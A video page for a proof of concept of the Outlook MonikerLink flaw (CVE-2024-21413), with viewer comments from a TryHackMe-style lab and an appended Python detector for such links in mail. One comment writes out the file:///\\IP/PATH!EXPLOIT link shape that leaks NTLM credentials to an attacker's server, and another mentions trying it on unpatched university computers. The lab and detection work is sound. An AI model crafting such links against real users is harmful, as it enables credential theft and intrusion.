CVE-2024-21413 - Microsoft Outlook Remote Code Execution Vulnerability POC
- Published on Oct 5, 2024
- An attacker could craft a malicious link that bypasses the Protected View Protocol, which leads to the leaking of local NTLM credential information and remote code execution (RCE).
#CVE-2024-21413 #infosec #rce #outlook #pentester
Amazingly simple poc...thx!
To reinstall and renew security after experiencing the CVE-2024-21413 Microsoft Outlook Remote Code Execution Vulnerability, organizations should follow the remediation steps outlined by the Triskele Labs team and the Microsoft Security Response Center (MSRC). This may include applying patches released by Microsoft, updating affected versions of Microsoft Outlook, and implementing additional security measures to prevent exploitation of the vulnerability. It is crucial to stay informed about security updates and best practices to mitigate the risks associated with this vulnerability.
Nice video but no sound.
good !!
Hi, where did you get the snapshot with the vulnerable version of Outlook?
My uni's computers didn't do the update yet, I wonder if.. (I'm too lazy to do it but it prolly works)
thanks for the vid
🙏🙏 thank
What is the link on GitHub? Thanks for the video.
github.com/CMNatic/CVE-2024-21413
I don't want to know how much Outlook got spammed with this shit man
Go lie down and sleep, that's better than making tutorials
Hi, I followed the same steps but my NTLM creds look different: it is not ADMINISTRATOR, it started with the tryhackme username (Note: I am using RDP to connect to the attackbox), and also if I run hashcat on the resulting hash, every time it is getting exhausted (Note: I am using 4gb memory too)
Ah, I see, because you're creating a link with a "file" (with this structure: file:///\\IP-ADDR/PATH!EXPLOIT ) in the path. But with this path, which actually calls a potentially arbitrary URL or IP address, you can exfiltrate the NTLM credentials because Outlook authenticates itself with the currently logged-in user at the file system, which is in our case the catcher server. Is that correct?
That's correct. More details here: research.checkpoint.com/2024/the-risks-of-the-monikerlink-bug-in-microsoft-outlook-and-the-big-picture/
@zalepentester Thank you very much - the article you sent answers my further questions and is very interesting.
@science0101 Don't worry. THANKS!!!
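A defender-side check for the link shape discussed in the thread above (`file:///\\IP-ADDR/PATH!EXPLOIT`), as an added example that is not part of the video or its repository: it scans an HTML mail body for `file:` links to a remote host and separates those carrying a `!` suffix from plain remote file links. The function names, verdict labels and sample body are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# file: URL = separators, host, separator, path, optional "!suffix"
FILE_URL = re.compile(
    r"^file:[/\\]+(?P<host>[^/\\!]+)[/\\]?(?P<path>[^!]*)(?:!(?P<suffix>.*))?$",
    re.IGNORECASE | re.DOTALL,
)
# Drive letters and loopback names are local paths, not remote shares.
LOCAL_HOST = re.compile(r"^(?:[A-Za-z]:|localhost|127\.0\.0\.1)$", re.IGNORECASE)

class _HrefCollector(HTMLParser):
    """Collects href/src values; HTMLParser decodes HTML entities in them."""

    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in ("href", "src") and value:
                self.urls.append(value)

def classify_url(url):
    """Return 'moniker-link', 'remote-file-link' or None for one URL."""
    decoded = unquote(url.strip())  # undo %5C, %21 and similar encodings
    m = FILE_URL.match(decoded)
    if not m or LOCAL_HOST.match(m.group("host")):
        return None
    return "moniker-link" if m.group("suffix") is not None else "remote-file-link"

def scan_html_body(html):
    """Return [(verdict, url)] for every flagged link in an HTML mail body."""
    parser = _HrefCollector()
    parser.feed(html)
    parser.close()
    return [(v, u) for u in parser.urls if (v := classify_url(u))]

# Constructed sample body; 192.0.2.10 is a documentation address (RFC 5737).
SAMPLE = (
    '<p><a href="https://example.com/report">ok</a> '
    '<a href="file:///\\\\192.0.2.10/share/doc.rtf!x">a</a> '
    '<a href="file://192.0.2.10/share/doc.rtf">b</a> '
    '<a href="file:///%5C%5C192.0.2.10/share/doc.rtf%21x">c</a> '
    '<a href="file:///C:/Users/me/notes.txt">d</a></p>'
)
```

Calling `scan_html_body(SAMPLE)` flags links a, b and c and ignores the https link and the local drive path; a mail gateway rule would quarantine or rewrite the flagged links.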